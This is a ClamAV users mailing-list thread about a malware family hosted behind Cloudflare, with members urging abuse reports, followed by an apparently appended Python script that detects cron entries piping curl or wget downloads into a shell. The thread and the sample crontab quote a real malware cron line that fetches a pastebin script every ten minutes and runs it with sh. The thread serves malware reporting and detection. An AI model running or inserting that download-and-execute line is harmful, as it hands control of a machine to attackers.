
List:       clamav-users
Subject:    Re: [clamav-users] LSD Malwares
From:       "Joel Esler \(jesler\) via clamav-users" <clamav-users () lists ! clamav ! net>
Date:       2019-04-29 13:33:13
Message-ID: 56AC678E-7A12-44D3-A057-019B9E246B27 () cisco ! com


Thank you for writing in.

Go to this URL to change user options or unsubscribe:
https://lists.Clamav.net/mailman/listinfo/Clamav-users

or by sending an email to Clamav-users-leave@lists.Clamav.net

Thanks!

-- 
Joel Esler
Manager, Communities Division
Cisco Talos Intelligence Group
http://www.talosintelligence.com

On Apr 26, 2019, at 1:35 PM, Vicstardust via clamav-users <clamav-users@lists.clamav.net> wrote:

Pls check my Previous EMAIL "UNSUBSCRIBE ME...ETC", just sent.
TXS

Have a nice Weekend!


Get BlueMail for Android <http://www.bluemail.me/r?b=14726>

On 26/04/2019, at 04:26, Xavier Maysonnave via clamav-users <clamav-users@lists.clamav.net> wrote:

Hi All,

Thanks for your feedback.
I'm going to report to Cloudflare this URL.

However, keep in mind that there are other URLs that are involved in this family.

*/10 * * * * (curl -fsSL https://pastebin.com/raw/wR3ETdbi||wget -q -O- https://pastebin.com/raw/wR3ETdbi)|sh

This one targets Jenkins, another popular open-source tool, not used on our infrastructure though.

I'm still very interested in the consequences of this malware. Any hints will be greatly appreciated.

Thanks.

Light

Pudhuveedu / Xavier

PGP Fingerprint: CAE5 CE4A EFE9 134F D991 5465 081C B6FB 2EAC 6CC9 <http://keyserver.ubuntu.com/pks/lookup?op=get&search=0x081CB6FB2EAC6CC9>


On Fri, 26 Apr 2019 at 08:03, Dave Warren via clamav-users <clamav-users@lists.clamav.net> wrote:

The same applies: Report it. Cloudflare will either forward the complaint for you, or block the offending URL (or both).

On 2019-04-25 19:16, Dennis Peterson wrote:
> That domain is hosted on a Cloudflare IP block. They've become part of
> the problem.
> 
> dp
> 
> On 4/25/19 7:52 AM, J.R. via clamav-users wrote:
> > Perhaps it would also be worthwhile to report dd.heheda.tk to their
> > hosting provider & domain registrar that they are hosting malware and
> > get that site shut down...
> > 

_______________________________________________

clamav-users mailing list
clamav-users@lists.clamav.net<mailto:clamav-users@lists.clamav.net>
https://lists.clamav.net/mailman/listinfo/clamav-users


Help us build a comprehensive ClamAV guide:
https://github.com/vrtadmin/clamav-faq

http://www.clamav.net/contact.html#ml

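A defender-side check for the persistence pattern in the cron line Xavier quoted (a periodic curl/wget fetch piped straight into sh), added here as an example and not code from any poster or from the ClamAV project: it parses crontab text, flags entries that fetch over the network and pipe the result into an interpreter, and lists the URLs they pull. The sample crontab is constructed; it embeds the cron line quoted in the thread alongside two benign entries.

```python
import re

# Network fetchers and "pipe into an interpreter" patterns, correlated per entry.
FETCHERS = re.compile(r"\b(curl|wget)\b")
PIPE_TO_SHELL = re.compile(r"\|\s*(?:/\S*/)?(sh|bash|dash|zsh|ksh|python\d?|perl)\b")
URL = re.compile(r"https?://[^\s|)'\"]+")

# Constructed sample: the cron line quoted in the thread plus two benign entries.
SAMPLE_CRONTAB = """\
# constructed crontab for the example
SHELL=/bin/sh
0 3 * * * /usr/bin/freshclam --quiet
*/10 * * * * (curl -fsSL https://pastebin.com/raw/wR3ETdbi||wget -q -O- https://pastebin.com/raw/wR3ETdbi)|sh
@daily /usr/local/bin/backup.sh >/dev/null 2>&1
"""

def split_cron_line(line):
    """Return (schedule, command), or None for blanks, comments and VAR=value lines."""
    line = line.strip()
    if not line or line.startswith("#") or re.match(r"^\w+=", line):
        return None
    if line.startswith("@"):                 # @daily, @reboot, ... use one field
        parts = line.split(None, 1)
        return parts[0], (parts[1] if len(parts) > 1 else "")
    parts = line.split(None, 5)              # five time fields, then the command
    if len(parts) < 6:
        return None
    return " ".join(parts[:5]), parts[5]

def find_download_and_execute(crontab):
    """One finding per entry that fetches over the network and pipes into a shell."""
    findings = []
    for line in crontab.splitlines():
        parsed = split_cron_line(line)
        if parsed is None:
            continue
        schedule, command = parsed
        if FETCHERS.search(command) and PIPE_TO_SHELL.search(command):
            findings.append({
                "schedule": schedule,
                "command": command,
                "urls": sorted(set(URL.findall(command))),   # de-duplicated
            })
    return findings

if __name__ == "__main__":
    for f in find_download_and_execute(SAMPLE_CRONTAB):
        print(f"[!] '{f['schedule']}' fetches {f['urls']} and runs: {f['command']}")
```

Run it against `crontab -l` output, /etc/crontab and the /etc/cron.d drop-ins on a host you suspect; a hit tells you the schedule and the remote source to pull for analysis.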

